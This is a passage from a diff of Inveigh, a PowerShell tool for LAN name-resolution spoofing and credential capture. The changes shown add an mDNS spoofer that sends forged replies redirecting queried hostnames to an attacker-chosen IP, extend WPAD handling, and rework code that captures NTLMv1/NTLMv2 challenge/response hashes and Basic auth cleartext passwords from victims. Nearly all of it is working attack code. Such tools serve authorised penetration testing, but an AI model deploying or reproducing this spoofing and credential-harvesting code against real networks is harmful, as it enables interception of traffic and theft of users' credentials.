user agent from $HTTP_source_IP") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + } + + } + + } if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") { @@ -1520,10 +1705,12 @@ $HTTP_scriptblock = $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length) } - if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')) + if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or ( + $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_}))) { $HTTP_response_status_code = 0x32,0x30,0x30 $HTTP_response_phrase = 0x4f,0x4b + $HTTP_client_close = $true } else { @@ -1549,44 +1736,7 @@ $HTTP_scriptblock = } $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64 - } - - $NTLM = "NTLM" - $NTLM_auth = $false - $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString - - if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")]) - - if($TCP_request -like "*-48-6F-73-74-3A-20-*") - { - $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 18) - $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-")) - $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length) - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")]) - } - - if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*") - { - $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36) - $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-")) - $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length) - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")]) - - if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)})) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")]) - } - - } - + $HTTP_client_close = $false } if($TCP_request -like "50-4f-53-54*") @@ -1601,11 +1751,16 @@ $HTTP_scriptblock = $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP") $inveigh.POST_request_file_queue.Add($HTTP_POST_request) $inveigh.POST_request_list.Add($HTTP_POST_request) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")]) if($inveigh.file_output) { $inveigh.console_queue.Add("$HTTP_type POST request written to " + $inveigh.POST_request_out_file) + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP") } } @@ -1617,26 +1772,13 @@ $HTTP_scriptblock = { $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ','' [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization) - - if($proxy_listener) - { - $HTTP_response_status_code = 0x34,0x30,0x37 - $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 - } - else - { - $HTTP_response_status_code = 0x34,0x30,0x31 - $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 - } if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') { $NTLM = NTLMChallengeBase64 $Challenge $HTTPNTLMESS $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port - $HTTP_client_close = $false } elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') { - $NTLM = "NTLM" $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes @@ -1668,17 +1810,26 @@ $HTTP_scriptblock = $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) + { $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") } else { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) @@ -1703,16 +1854,25 @@ $HTTP_scriptblock = if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") } else { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) @@ -1737,7 +1897,6 @@ $HTTP_scriptblock = $HTTP_response_status_code = 0x32,0x30,0x30 $HTTP_response_phrase = 0x4f,0x4b - $NTLM_auth = $true $HTTP_client_close = $true $NTLM_challenge = "" @@ -1750,7 +1909,7 @@ $HTTP_scriptblock = } else { - $HTTP_client.Client.Close() + $HTTP_send = $false } } @@ -1758,8 +1917,7 @@ $HTTP_scriptblock = } else { - $NTLM = "NTLM" - $HTTP_client_close = $false + $HTTP_client_close = $true } } @@ -1770,7 +1928,6 @@ $HTTP_scriptblock = $HTTP_header_authorization = $HTTP_header_authorization -replace 'Basic ','' $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($HTTP_header_authorization)) $HTTP_client_close = $true - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")]) $inveigh.cleartext_file_queue.Add($cleartext_credentials) $inveigh.cleartext_list.Add($cleartext_credentials) $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") @@ -1778,24 +1935,18 @@ $HTTP_scriptblock = if($inveigh.file_output) { $inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP") } - - } - else - { - if($HTTPAuth -ne 'Anonymous' -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -ne 'Anonymous')) + if($inveigh.log_output) { - $HTTP_client_close = $false - } - else - { - $HTTP_client_close = $true + $inveigh.log.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP") } - + } - if(($HTTPAuth -eq 'Anonymous' -and $HTTP_request_raw_url -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $HTTP_request_raw_url -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth) + if(($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or ( + $WPADAuthIgnore.Count -gt 0 -and $WPADAuth -like 'NTLM*' -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})) -or $HTTP_client_close) { if($HTTPDir -and $HTTPDefaultEXE -and $HTTP_request_raw_url -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url))) @@ -1837,7 +1988,7 @@ $HTTP_scriptblock = else { - if($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)}))) + if($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))) { $HTTP_message = $WPADResponse $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") @@ -1866,18 +2017,14 @@ $HTTP_scriptblock = $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) $HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message_bytes.Length) - if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth) - { + if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close) + { $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM) } elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat')) { $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm") } - else - { - $HTTP_response_status_code = 0x32,0x30,0x30 - } $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary $packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)) @@ -1902,10 +2049,14 @@ $HTTP_scriptblock = $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a)) } - $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes) - $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse - $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) - $HTTP_stream.Flush() + if($HTTP_send) + { + $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes) + $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse + $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) + $HTTP_stream.Flush() + } + Start-Sleep -m 10 $HTTP_request_raw_URL_old = $HTTP_request_raw_URL $HTTP_client_handle_old = $HTTP_client.Client.Handle @@ -1935,7 +2086,7 @@ $HTTP_scriptblock = $HTTP_client.Close() start-sleep -s 1 - $HTTP_listener.Server.blocking = $false + $HTTP_listener.Server.Blocking = $false Start-Sleep -s 1 $HTTP_listener.Server.Close() Start-Sleep -s 1 @@ -1945,8 +2096,8 @@ $HTTP_scriptblock = # Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer $sniffer_scriptblock = { - param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore, - $SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval,$RunTime,$LLMNRTTL,$NBNSTTL) + param ($IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,$mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,$SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply, + $SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval) $sniffer_running = $true $byte_in = New-Object System.Byte[] 4 @@ -1968,14 +2119,26 @@ $sniffer_scriptblock = catch { $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")]) $sniffer_running = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer") + } + } $inveigh.sniffer_socket.Bind($end_point) $inveigh.sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out) $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) [Array]::Reverse($LLMNR_TTL_bytes) + $mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL) + [Array]::Reverse($mDNS_TTL_bytes) $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) [Array]::Reverse($NBNS_TTL_bytes) $LLMNR_learning_log = New-Object System.Collections.Generic.List[string] @@ -2013,7 +2176,7 @@ $sniffer_scriptblock = $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) $binary_reader.ReadBytes(16) $TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4 - $binary_reader.ReadByte(7) + $binary_reader.ReadBytes(7) $payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length)) switch ($destination_port) @@ -2238,7 +2401,17 @@ $sniffer_scriptblock = $NBNS_UDP_client.Close() $NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_transaction_ID $NBNS_query_string") $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) + } + } } @@ -2324,7 +2497,17 @@ $sniffer_scriptblock = if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00') { $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + } + } elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) { @@ -2336,10 +2519,191 @@ $sniffer_scriptblock = { $inveigh.valid_host_list.Add($NBNS_query_string) $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list") + } + + } + + } + + } + + } + + 5353 # mDNS + { + + if([System.BitConverter]::ToString($payload_bytes) -like '*-00-01-80-01') + { + $UDP_length[0] += 10 + $mDNS_query_payload_bytes = $payload_bytes[(12)..($payload_bytes.Length - 5)] + $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes + $mDNS_query_string_full = $mDNS_query_string + ".local" + + $mDNS_response_data = $mDNS_query_payload_bytes + + 0x00,0x01,0x00,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $mDNS_response_packet = 0x14,0xe9 + + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_response_data + + if($mDNS -eq 'Y') + { + + if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and ( + !$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QU')) + { + $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) + $send_socket.SendBufferSize = 1024 + $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) + $send_socket.SendTo($mDNS_response_packet,$destination_point) + $send_socket.Close() + $mDNS_response_message = "- response sent" + } + else + { + + if($mDNSTypes -notcontains 'QU') + { + $mDNS_response_message = "- disabled mDNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $mDNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $mDNS_response_message = "- $source_IP is on ignore list" + } + else + { + $mDNS_response_message = "- not spoofed due to previous capture" + } + + } + + } + + $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + } + elseif([System.BitConverter]::ToString($payload_bytes) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*') + { + $UDP_length[0] += 4 + $mDNS_query_payload_bytes = $payload_bytes[12..($payload_bytes[12] + 12)] + $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes + $mDNS_query_string_full = $mDNS_query_string + ".local" + + $mDNS_response_data = $mDNS_query_payload_bytes + + 0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 + + 0x00,0x01,0x80,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + + $mDNS_response_packet = 0x14,0xe9 + + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_response_data + + if($mDNS -eq 'Y') + { + + if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and ( + !$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QM')) + { + $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) + $send_socket.SendBufferSize = 1024 + $destination_point = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.251",5353) + $send_socket.SendTo($mDNS_response_packet,$destination_point) + $send_socket.Close() + $mDNS_response_message = "- response sent" + } + else + { + + if($mDNSTypes -notcontains 'QM') + { + $mDNS_response_message = "- disabled mDNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $mDNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $mDNS_response_message = "- $source_IP is on ignore list" + } + else + { + $mDNS_response_message = "- not spoofed due to previous capture" + } + } + } + + $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + } + } 5355 # LLMNR @@ -2425,7 +2789,17 @@ $sniffer_scriptblock = $LLMNR_UDP_client.Close() $LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string") $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252") + } + } } @@ -2493,10 +2867,21 @@ $sniffer_scriptblock = if(!$LLMNR_request_ignore) { $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + + 